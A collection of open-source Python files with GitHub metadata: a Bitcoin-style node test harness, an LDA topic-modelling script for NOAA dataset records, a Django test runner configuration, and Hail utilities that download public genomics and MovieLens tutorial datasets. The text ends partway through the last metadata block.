raise FailedToStartError(self._node_msg(
'bitcoind exited with status {} during initialization'.format(self.process.returncode)))
try:
rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.chain, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.log.debug("RPC successfully started")
if self.use_cli:
return
self.rpc = rpc
self.rpc_connected = True
self.url = self.rpc.url
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
# -28 RPC in warmup
# -342 Service unavailable, RPC server started but is shutting down due to error
if e.error['code'] != -28 and e.error['code'] != -342:
raise # unknown JSON RPC exception
except ConnectionResetError:
# This might happen when the RPC server is in warmup, but shut down before the call to getblockcount
# succeeds. Try again to properly raise the FailedToStartError
pass
except ValueError as e: # cookie file not found and no rpcuser or rpcassword. bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
self._raise_assertion_error("Unable to connect to bitcoind")
def generate(self, nblocks, maxtries=1000000):
self.log.debug("TestNode.generate() dispatches `generate` call to `generatetoaddress`")
return self.generatetoaddress(nblocks=nblocks, address=self.get_deterministic_priv_key().address, maxtries=maxtries)
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected and self.rpc, self._node_msg("RPC not connected")
wallet_path = "wallet/{}".format(urllib.parse.quote(wallet_name))
return self.rpc / wallet_path
def stop_node(self, expected_stderr='', wait=0):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
# Do not use wait argument when testing older nodes, e.g. in feature_backwards_compatibility.py
if self.version is None or self.version >= 180000:
self.stop(wait=wait)
else:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
# If there are any running perf processes, stop them.
for profile_name in tuple(self.perf_subprocesses.keys()):
self._stop_perf(profile_name)
# Check that stderr is as expected
self.stderr.seek(0)
stderr = self.stderr.read().decode('utf-8').strip()
if stderr != expected_stderr:
raise AssertionError("Unexpected stderr {} != {}".format(stderr, expected_stderr))
self.stdout.close()
self.stderr.close()
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert return_code == 0, self._node_msg(
"Node returned non-zero exit code (%d) when stopping" % return_code)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
@contextlib.contextmanager
def assert_debug_log(self, expected_msgs, unexpected_msgs=None, timeout=2):
if unexpected_msgs is None:
unexpected_msgs = []
time_end = time.time() + timeout
debug_log = os.path.join(self.datadir, self.chain, 'debug.log')
with open(debug_log, encoding='utf-8') as dl:
dl.seek(0, 2)
prev_size = dl.tell()
yield
while True:
found = True
with open(debug_log, encoding='utf-8') as dl:
dl.seek(prev_size)
log = dl.read()
print_log = " - " + "\n - ".join(log.splitlines())
for unexpected_msg in unexpected_msgs:
if re.search(re.escape(unexpected_msg), log, flags=re.MULTILINE):
self._raise_assertion_error('Unexpected message "{}" partially matches log:\n\n{}\n\n'.format(unexpected_msg, print_log))
for expected_msg in expected_msgs:
if re.search(re.escape(expected_msg), log, flags=re.MULTILINE) is None:
found = False
if found:
return
if time.time() >= time_end:
break
time.sleep(0.05)
self._raise_assertion_error('Expected messages "{}" does not partially match log:\n\n{}\n\n'.format(str(expected_msgs), print_log))
@contextlib.contextmanager
def profile_with_perf(self, profile_name):
"""
Context manager that allows easy profiling of node activity using `perf`.
See `test/functional/README.md` for details on perf usage.
Args:
profile_name (str): This string will be appended to the
profile data filename generated by perf.
"""
subp = self._start_perf(profile_name)
yield
if subp:
self._stop_perf(profile_name)
def _start_perf(self, profile_name=None):
"""Start a perf process to profile this node.
Returns the subprocess running perf."""
subp = None
def test_success(cmd):
return subprocess.call(
# shell=True required for pipe use below
cmd, shell=True,
stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) == 0
if not sys.platform.startswith('linux'):
self.log.warning("Can't profile with perf; only available on Linux platforms")
return None
if not test_success('which perf'):
self.log.warning("Can't profile with perf; must install perf-tools")
return None
if not test_success('readelf -S {} | grep .debug_str'.format(shlex.quote(self.binary))):
self.log.warning(
"perf output won't be very useful without debug symbols compiled into bitcoind")
output_path = tempfile.NamedTemporaryFile(
dir=self.datadir,
prefix="{}.perf.data.".format(profile_name or 'test'),
delete=False,
).name
cmd = [
'perf', 'record',
'-g', # Record the callgraph.
'--call-graph', 'dwarf', # Compatibility for gcc's --fomit-frame-pointer.
'-F', '101', # Sampling frequency in Hz.
'-p', str(self.process.pid),
'-o', output_path,
]
subp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.perf_subprocesses[profile_name] = subp
return subp
def _stop_perf(self, profile_name):
"""Stop (and pop) a perf subprocess."""
subp = self.perf_subprocesses.pop(profile_name)
output_path = subp.args[subp.args.index('-o') + 1]
subp.terminate()
subp.wait(timeout=10)
stderr = subp.stderr.read().decode()
if 'Consider tweaking /proc/sys/kernel/perf_event_paranoid' in stderr:
self.log.warning(
"perf couldn't collect data! Try "
"'sudo sysctl -w kernel.perf_event_paranoid=-1'")
else:
report_cmd = "perf report -i {}".format(output_path)
self.log.info("See perf output by running '{}'".format(report_cmd))
def assert_start_raises_init_error(self, extra_args=None, expected_msg=None, match=ErrorMatch.FULL_TEXT, *args, **kwargs):
"""Attempt to start the node and expect it to raise an error.
extra_args: extra arguments to pass through to bitcoind
expected_msg: regex that stderr should match when bitcoind fails
Will throw if bitcoind starts without an error.
Will throw if an expected_msg is provided and it does not match bitcoind's stdout."""
with tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False) as log_stderr, \
tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False) as log_stdout:
try:
self.start(extra_args, stdout=log_stdout, stderr=log_stderr, *args, **kwargs)
self.wait_for_rpc_connection()
self.stop_node()
self.wait_until_stopped()
except FailedToStartError as e:
self.log.debug('bitcoind failed to start: %s', e)
self.running = False
self.process = None
# Check stderr for expected message
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8').strip()
if match == ErrorMatch.PARTIAL_REGEX:
if re.search(expected_msg, stderr, flags=re.MULTILINE) is None:
self._raise_assertion_error(
'Expected message "{}" does not partially match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_REGEX:
if re.fullmatch(expected_msg, stderr) is None:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_TEXT:
if expected_msg != stderr:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
else:
if expected_msg is None:
assert_msg = "bitcoind should have exited with an error"
else:
assert_msg = "bitcoind should have exited with expected error " + expected_msg
self._raise_assertion_error(assert_msg)
def add_p2p_connection(self, p2p_conn, *, wait_for_verack=True, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(**kwargs, net=self.chain)()
self.p2ps.append(p2p_conn)
if wait_for_verack:
# Wait for the node to send us the version and verack
p2p_conn.wait_for_verack()
# At this point we have sent our version message and received the version and verack, however the full node
# has not yet received the verack from us (in reply to their version). So, the connection is not yet fully
# established (fSuccessfullyConnected).
#
# This shouldn't lead to any issues when sending messages, since the verack will be in-flight before the
# message we send. However, it might lead to races where we are expecting to receive a message. E.g. a
# transaction that will be added to the mempool as soon as we return here.
#
# So syncing here is redundant when we only want to send a message, but the cost is low (a few milliseconds)
# in comparision to the upside of making tests less fragile and unexpected intermittent errors less likely.
p2p_conn.sync_with_ping()
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, self._node_msg("No p2p connection")
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
def __init__(self, cli, command):
self.cli = cli
self.command = command
def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
def arg_to_cli(arg):
if isinstance(arg, bool):
return str(arg).lower()
elif isinstance(arg, dict) or isinstance(arg, list):
return json.dumps(arg, default=EncodeDecimal)
else:
return str(arg)
class TestNodeCLI():
"""Interface to bitcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run bitcoin-cli command. Deserializes returned string as python object."""
pos_args = [arg_to_cli(arg) for arg in args]
named_args = [str(key) + "=" + arg_to_cli(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same bitcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running bitcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except json.JSONDecodeError:
return cli_stdout.rstrip("\n")
|
{
"content_hash": "e9b18052d4e1f2507aa82a6cbd02a56d",
"timestamp": "",
"source": "github",
"line_count": 578,
"max_line_length": 207,
"avg_line_length": 43.08477508650519,
"alnum_prop": 0.6101272939003333,
"repo_name": "ahmedbodi/vertcoin",
"id": "53bc5ca9e7a15db56b851383b84393e5c278e66d",
"size": "25117",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "test/functional/test_framework/test_node.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28456"
},
{
"name": "C",
"bytes": "1163389"
},
{
"name": "C++",
"bytes": "4857520"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50622"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "185589"
},
{
"name": "Makefile",
"bytes": "108571"
},
{
"name": "Objective-C",
"bytes": "3892"
},
{
"name": "Objective-C++",
"bytes": "7232"
},
{
"name": "Protocol Buffer",
"bytes": "2328"
},
{
"name": "Python",
"bytes": "1076417"
},
{
"name": "QMake",
"bytes": "756"
},
{
"name": "Shell",
"bytes": "48193"
}
],
"symlink_target": ""
}
|
"""
Notes: In LDA, time complexity is proportional to (n_samples * iterations).
"""
#####################################################################
# Imports
#####################################################################
from __future__ import print_function # Not necessary for Python 3
from time import time
import re
import csv
import json
import pymongo
import requests
import numpy as np
from sklearn.feature_extraction import text
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
#####################################################################
# Global Variables
#####################################################################
conn=pymongo.MongoClient()
db = conn.earthwindfire
noaa_coll = db.noaa_coll
n_features = 200000
n_topics = 50
n_top_words = 30
domain_stops = ["department","commerce","doc","noaa","national", "data", \
"centers", "united", "states", "administration"]
stopwords = text.ENGLISH_STOP_WORDS.union(domain_stops)
#####################################################################
# Helper Functions
#####################################################################
def saveClusters(model, feature_names, n_top_words):
"""
Takes the model, the names of the features, and the
requested number of top words for each cluster, and
returns each cluster.
"""
for topic_idx, topic in enumerate(model.components_):
t = "Topic #%d:" % (topic_idx+1)
topwords = []
x = topic.argsort()
y = x[:-n_top_words - 1:-1]
for i in y:
topwords.append(feature_names[i].encode('utf-8'))
yield t,topwords
def getWords(feature_names,cluster_id):
"""
Just return the words for a given cluster, with given feature_names.
"""
words = []
for topic_idx, topic in enumerate(lda.components_):
if topic_idx == cluster_id:
words.append(" ".join([tf_feature_names[i].encode('utf-8') for i in topic.argsort()[:-31:-1]]))
return words
def printClusters(model, feature_names, n_top_words):
"""
Takes the model, the names of the features, and the
requested number of top words for each cluster, and
prints out each cluster.
"""
for topic_idx, topic in enumerate(model.components_):
print("Topic #%d:" % (topic_idx+1))
print(" ".join([feature_names[i]
for i in topic.argsort()[:-n_top_words - 1:-1]]))
print()
def loadData(URL,collection):
"""
Loads the JSON data from URL, connects to MongoDB & enters dicts into collection
"""
if collection.count() > 20000:
print("%d records already loaded" % collection.count())
else:
r = requests.get(URL)
json_data = r.json()
for dataset in json_data:
data ={}
data["title"] = dataset["title"]
data["description"] = dataset["description"]
data["keywords"] = dataset["keyword"]
collection.insert_one(data)
print("Successfully loaded %d records into MongoDB." % collection.count())
def wrangleData(collection):
"""
Reads in MongoDB documents, extracts and joins the content from the relevant
fields for each record (keyword, title, description) and returns a list.
"""
data_samples = []
for entry in collection.find():
title = " ".join(filter(lambda x: x.isalpha(), entry[u'title'].split()))
description = " ".join(filter(lambda x: x.isalpha(), entry[u'description'].split()))
keywords = " ".join(filter(lambda x: x.isalpha(), entry[u'keywords']))
data_samples.append(title+" "+description+" "+keywords)
return data_samples
if __name__ == '__main__':
with open('lda_clusters_v2.csv', 'wb') as f1:
writer = csv.writer(f1)
writer.writerow(["cluster","top words"])
# Start the clock
t0 = time()
# Load the data into MongoDB
print("Checking to see if you have the data...")
loadData("https://data.noaa.gov/data.json",noaa_coll)
noaa_samples = wrangleData(noaa_coll)
print("done in %0.3fs." % (time() - t0))
# Restart the clock
t0 = time()
# Extract raw term counts to compute term frequency.
print("Extracting term frequency features for LDA...")
tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, ngram_range=(1,2),
stop_words=stopwords)
tf = tf_vectorizer.fit_transform(noaa_samples)
print("done in %0.3fs." % (time() - t0))
# Restart the clock
t0 = time()
# Fit the LDA model
print("Fitting LDA model with term frequency features, n_samples=%d and n_features=%d..."
% (len(noaa_samples), n_features))
lda = LatentDirichletAllocation(n_topics=n_topics, max_iter=5, learning_offset=50.,
random_state=0)
lda.fit(tf)
print("done in %0.3fs." % (time() - t0))
# Save the clusters
tf_feature_names = tf_vectorizer.get_feature_names()
for x in saveClusters(lda, tf_feature_names, n_top_words):
writer.writerow([str(x[0]),str(x[1])])
# # You can also pring out the clusters if you want to see them
# printClusters(lda, tf_feature_names, n_top_words)
# Now match up the records with the best fit clusters & corresponding keywords
with open('records_to_ldaclusters_v2.csv', 'wb') as f2:
writer = csv.writer(f2)
writer.writerow(["record_index","record_text","five_best_clusters","suggested_keywords"])
# Restart the clock
t0 = time()
print("Finding the best keywords for each record and writing up results...")
results = lda.transform(tf)
for i in range(len(results)):
try:
best_results = (-results[i]).argsort()[:5]
keywords = []
for x in np.nditer(best_results):
keywords.extend(getWords(tf_feature_names, x))
flattened = " ".join(keywords)
writer.writerow([i, noaa_samples[i], best_results, flattened])
#TODO => need to figure out the Unicode Error
except UnicodeEncodeError: pass
print("done in %0.3fs." % (time() - t0))
|
{
"content_hash": "c335fe0b254898aae7440f9cf489ecde",
"timestamp": "",
"source": "github",
"line_count": 172,
"max_line_length": 107,
"avg_line_length": 37.2093023255814,
"alnum_prop": 0.565625,
"repo_name": "CommerceDataService/recordtagger",
"id": "a148b6dd64ede92a4e98721ed294036dde2e6f8f",
"size": "6658",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lda/lda_tag.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29340"
}
],
"symlink_target": ""
}
|
from . import base
|
{
"content_hash": "123e81593bbb9185b6e4f5d8cdf3bb2f",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 18,
"avg_line_length": 19,
"alnum_prop": 0.7368421052631579,
"repo_name": "pl8787/MatchPyramid-TensorFlow",
"id": "0e44449338cf3ff3bb3d124ef22c8f7bbca760a5",
"size": "19",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "pytextnet/io/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16716"
}
],
"symlink_target": ""
}
|
import sys
import django
from django.conf import settings, global_settings as default_settings
from django.core.management import execute_from_command_line
if not settings.configured:
settings.configure(
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
TEMPLATE_LOADERS = (
'django.template.loaders.app_directories.Loader',
),
TEMPLATE_CONTEXT_PROCESSORS = default_settings.TEMPLATE_CONTEXT_PROCESSORS + (
'django.core.context_processors.request',
),
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sites',
'django.contrib.admin',
'fluent_contents',
#'fluent_contents.plugins.code',
'fluent_contents.plugins.commentsarea',
#'fluent_contents.plugins.disquswidgets',
#'fluent_contents.plugins.formdesignerlink',
'fluent_contents.plugins.gist',
'fluent_contents.plugins.googledocsviewer',
'fluent_contents.plugins.iframe',
#'fluent_contents.plugins.markup',
#'fluent_contents.plugins.oembeditem',
#'fluent_contents.plugins.picture',
'fluent_contents.plugins.rawhtml',
#'fluent_contents.plugins.sharedcontent',
'fluent_contents.plugins.text',
#'fluent_contents.plugins.twitterfeed',
#'disqus',
'django_wysiwyg',
#'form_designer',
'fluent_contents.tests.testapp',
),
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
ROOT_URLCONF = 'fluent_contents.tests.testapp.urls',
TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner' if django.VERSION < (1,6) else 'django.test.runner.DiscoverRunner',
SITE_ID = 3,
FLUENT_CONTENTS_CACHE_OUTPUT = True,
FLUENT_CONTENTS_CACHE_PLACEHOLDER_OUTPUT = True,
#DISQUS_API_KEY = 'test',
#DISQUS_WEBSITE_SHORTNAME = 'test',
STATIC_URL = '/static/',
)
if django.VERSION < (1,6):
# Different test runner, needs to name all apps,
# it doesn't locate a tests*.py in each subfolder.
DEFAULT_TEST_APPS = [
'fluent_contents',
'text',
]
else:
DEFAULT_TEST_APPS = [
'fluent_contents',
]
def runtests():
other_args = list(filter(lambda arg: arg.startswith('-'), sys.argv[1:]))
test_apps = list(filter(lambda arg: not arg.startswith('-'), sys.argv[1:])) or DEFAULT_TEST_APPS
argv = sys.argv[:1] + ['test', '--traceback'] + other_args + test_apps
execute_from_command_line(argv)
if __name__ == '__main__':
runtests()
|
{
"content_hash": "54cbd30b1b35644479c9d5f9d8d0bed4",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 132,
"avg_line_length": 37.39506172839506,
"alnum_prop": 0.5985473753714097,
"repo_name": "jpotterm/django-fluent-contents",
"id": "d7a00b5561629e6e5dee0961610102375f58cdc3",
"size": "3051",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "runtests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13178"
},
{
"name": "HTML",
"bytes": "33138"
},
{
"name": "JavaScript",
"bytes": "80446"
},
{
"name": "Python",
"bytes": "450641"
}
],
"symlink_target": ""
}
|
import hail as hl
from .java import Env, info
from .misc import new_temp_file, local_path_uri, new_local_temp_dir
import os
import zipfile
from urllib.request import urlretrieve
from hailtop.utils import sync_retry_transient_errors
__all__ = [
'get_1kg',
'get_hgdp',
'get_movie_lens'
]
resources = {
'1kg_annotations': 'https://storage.googleapis.com/hail-tutorial/1kg_annotations.txt',
'1kg_matrix_table': 'https://storage.googleapis.com/hail-tutorial/1kg.vcf.bgz',
'1kg_ensembl_gene_annotations': 'https://storage.googleapis.com/hail-tutorial/ensembl_gene_annotations.txt',
'HGDP_annotations': 'https://storage.googleapis.com/hail-tutorial/hgdp/hgdp_pop_and_sex_annotations.tsv',
'HGDP_matrix_table': 'https://storage.googleapis.com/hail-tutorial/hgdp/hgdp_subset.vcf.bgz',
'HGDP_ensembl_gene_annotations': 'https://storage.googleapis.com/hail-tutorial/hgdp/hgdp_gene_annotations.tsv',
'movie_lens_100k': 'https://files.grouplens.org/datasets/movielens/ml-100k.zip',
}
tmp_dir: str = None
def init_temp_dir():
global tmp_dir
if tmp_dir is None:
tmp_dir = new_local_temp_dir()
def _dir_exists(fs, path):
return fs.exists(path) and fs.is_dir(path)
def _file_exists(fs, path):
return fs.exists(path) and fs.is_file(path)
def _copy_to_tmp(fs, src, extension=None):
dst = new_temp_file(extension=extension)
fs.copy(src, dst)
return dst
def get_1kg(output_dir, overwrite: bool = False):
"""Download subset of the `1000 Genomes <http://www.internationalgenome.org/>`__
dataset and sample annotations.
Notes
-----
The download is about 15M.
Parameters
----------
output_dir
Directory in which to write data.
overwrite
If ``True``, overwrite any existing files/directories at `output_dir`.
"""
fs = Env.fs()
if not _dir_exists(fs, output_dir):
fs.mkdir(output_dir)
matrix_table_path = os.path.join(output_dir, '1kg.mt')
vcf_path = os.path.join(output_dir, '1kg.vcf.bgz')
sample_annotations_path = os.path.join(output_dir, '1kg_annotations.txt')
gene_annotations_path = os.path.join(output_dir, 'ensembl_gene_annotations.txt')
if (overwrite
or not _dir_exists(fs, matrix_table_path)
or not _file_exists(fs, sample_annotations_path)
or not _file_exists(fs, vcf_path)
or not _file_exists(fs, gene_annotations_path)):
init_temp_dir()
tmp_vcf = os.path.join(tmp_dir, '1kg.vcf.bgz')
source = resources['1kg_matrix_table']
info(f'downloading 1KG VCF ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, resources['1kg_matrix_table'], tmp_vcf)
cluster_readable_vcf = _copy_to_tmp(fs, local_path_uri(tmp_vcf), extension='vcf.bgz')
info('importing VCF and writing to matrix table...')
hl.import_vcf(cluster_readable_vcf, min_partitions=16).write(matrix_table_path, overwrite=True)
tmp_sample_annot = os.path.join(tmp_dir, '1kg_annotations.txt')
source = resources['1kg_annotations']
info(f'downloading 1KG annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_sample_annot)
tmp_gene_annot = os.path.join(tmp_dir, 'ensembl_gene_annotations.txt')
source = resources['1kg_ensembl_gene_annotations']
info(f'downloading Ensembl gene annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_gene_annot)
hl.hadoop_copy(local_path_uri(tmp_sample_annot), sample_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_gene_annot), gene_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_vcf), vcf_path)
info('Done!')
else:
info('1KG files found')
def get_hgdp(output_dir, overwrite: bool = False):
"""Download subset of the `Human Genome Diversity Panel
<https://www.internationalgenome.org/data-portal/data-collection/hgdp/>`__
dataset and sample annotations.
Notes
-----
The download is about 30MB.
Parameters
----------
output_dir
Directory in which to write data.
overwrite
If ``True``, overwrite any existing files/directories at `output_dir`.
"""
fs = Env.fs()
if not _dir_exists(fs, output_dir):
fs.mkdir(output_dir)
matrix_table_path = os.path.join(output_dir, 'HGDP.mt')
vcf_path = os.path.join(output_dir, 'HGDP.vcf.bgz')
sample_annotations_path = os.path.join(output_dir, 'HGDP_annotations.txt')
gene_annotations_path = os.path.join(output_dir, 'ensembl_gene_annotations.txt')
if (overwrite
or not _dir_exists(fs, matrix_table_path)
or not _file_exists(fs, sample_annotations_path)
or not _file_exists(fs, vcf_path)
or not _file_exists(fs, gene_annotations_path)):
init_temp_dir()
tmp_vcf = os.path.join(tmp_dir, 'HGDP.vcf.bgz')
source = resources['HGDP_matrix_table']
info(f'downloading HGDP VCF ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, resources['HGDP_matrix_table'], tmp_vcf)
cluster_readable_vcf = _copy_to_tmp(fs, local_path_uri(tmp_vcf), extension='vcf.bgz')
info('importing VCF and writing to matrix table...')
hl.import_vcf(cluster_readable_vcf, min_partitions=16, reference_genome='GRCh38').write(matrix_table_path, overwrite=True)
tmp_sample_annot = os.path.join(tmp_dir, 'HGDP_annotations.txt')
source = resources['HGDP_annotations']
info(f'downloading HGDP annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_sample_annot)
tmp_gene_annot = os.path.join(tmp_dir, 'ensembl_gene_annotations.txt')
source = resources['HGDP_ensembl_gene_annotations']
info(f'downloading Ensembl gene annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_gene_annot)
hl.hadoop_copy(local_path_uri(tmp_sample_annot), sample_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_gene_annot), gene_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_vcf), vcf_path)
info('Done!')
else:
info('HGDP files found')
def get_movie_lens(output_dir, overwrite: bool = False):
"""Download public Movie Lens dataset.
Notes
-----
The download is about 6M.
See the
`MovieLens website <https://grouplens.org/datasets/movielens/100k/>`__
for more information about this dataset.
Parameters
----------
output_dir
Directory in which to write data.
overwrite
If ``True``, overwrite existing files/directories at those locations.
"""
fs = Env.fs()
if not _dir_exists(fs, output_dir):
fs.mkdir(output_dir)
paths = [os.path.join(output_dir, x) for x in ['movies.ht', 'ratings.ht', 'users.ht']]
if overwrite or any(not _dir_exists(fs, f) for f in paths):
init_temp_dir()
source = resources['movie_lens_100k']
tmp_path = os.path.join(tmp_dir, 'ml-100k.zip')
info(f'downloading MovieLens-100k data ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_path)
with zipfile.ZipFile(tmp_path, 'r') as z:
z.extractall(tmp_dir)
user_table_path = os.path.join(tmp_dir, 'ml-100k', 'u.user')
movie_table_path = os.path.join(tmp_dir, 'ml-100k', 'u.item')
ratings_table_path = os.path.join(tmp_dir, 'ml-100k', 'u.data')
assert (os.path.exists(user_table_path))
assert (os.path.exists(movie_table_path))
assert (os.path.exists(ratings_table_path))
user_cluster_readable = _copy_to_tmp(fs, local_path_uri(user_table_path), extension='txt')
movie_cluster_readable = _copy_to_tmp(fs, local_path_uri(movie_table_path), 'txt')
ratings_cluster_readable = _copy_to_tmp(fs, local_path_uri(ratings_table_path), 'txt')
[movies_path, ratings_path, users_path] = paths
genres = ['Action', 'Adventure', 'Animation',
"Children's", 'Comedy', 'Crime',
'Documentary', 'Drama', 'Fantasy',
'Film-Noir', 'Horror', 'Musical',
'Mystery', 'Romance', 'Sci-Fi',
'Thriller', 'War', 'Western']
# utility functions for importing movies
def field_to_array(ds, field):
return hl.if_else(ds[field] != 0, hl.array([field]), hl.empty_array(hl.tstr))
def fields_to_array(ds, fields):
return hl.flatten(hl.array([field_to_array(ds, f) for f in fields]))
def rename_columns(ht, new_names):
return ht.rename({k: v for k, v in zip(ht.row, new_names)})
info(f'importing users table and writing to {users_path} ...')
users = rename_columns(
hl.import_table(user_cluster_readable, key=['f0'], no_header=True, impute=True, delimiter='|'),
['id', 'age', 'sex', 'occupation', 'zipcode'])
users.write(users_path, overwrite=True)
info(f'importing movies table and writing to {movies_path} ...')
movies = hl.import_table(movie_cluster_readable, key=['f0'], no_header=True, impute=True, delimiter='|')
movies = rename_columns(movies,
['id', 'title', 'release date', 'video release date', 'IMDb URL', 'unknown'] + genres)
movies = movies.drop('release date', 'video release date', 'unknown', 'IMDb URL')
movies = movies.transmute(genres=fields_to_array(movies, genres))
movies.write(movies_path, overwrite=True)
info(f'importing ratings table and writing to {ratings_path} ...')
ratings = hl.import_table(ratings_cluster_readable, no_header=True, impute=True)
ratings = rename_columns(ratings,
['user_id', 'movie_id', 'rating', 'timestamp'])
ratings = ratings.drop('timestamp')
ratings.write(ratings_path, overwrite=True)
else:
info('Movie Lens files found!')
|
{
"content_hash": "070a012e3617d3923824da7e2c53adaf",
"timestamp": "",
"source": "github",
"line_count": 258,
"max_line_length": 130,
"avg_line_length": 39.674418604651166,
"alnum_prop": 0.6285658460336069,
"repo_name": "hail-is/hail",
"id": "9bf58d18f3c93dd4af22b5faae1cc904cdde2f0c",
"size": "10236",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "hail/python/hail/utils/tutorial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7729"
},
{
"name": "C",
"bytes": "779"
},
{
"name": "C++",
"bytes": "171899"
},
{
"name": "CMake",
"bytes": "3045"
},
{
"name": "CSS",
"bytes": "666"
},
{
"name": "Dockerfile",
"bytes": "10056"
},
{
"name": "Emacs Lisp",
"bytes": "377"
},
{
"name": "HCL",
"bytes": "54923"
},
{
"name": "HTML",
"bytes": "155946"
},
{
"name": "Java",
"bytes": "38401"
},
{
"name": "JavaScript",
"bytes": "877"
},
{
"name": "Jupyter Notebook",
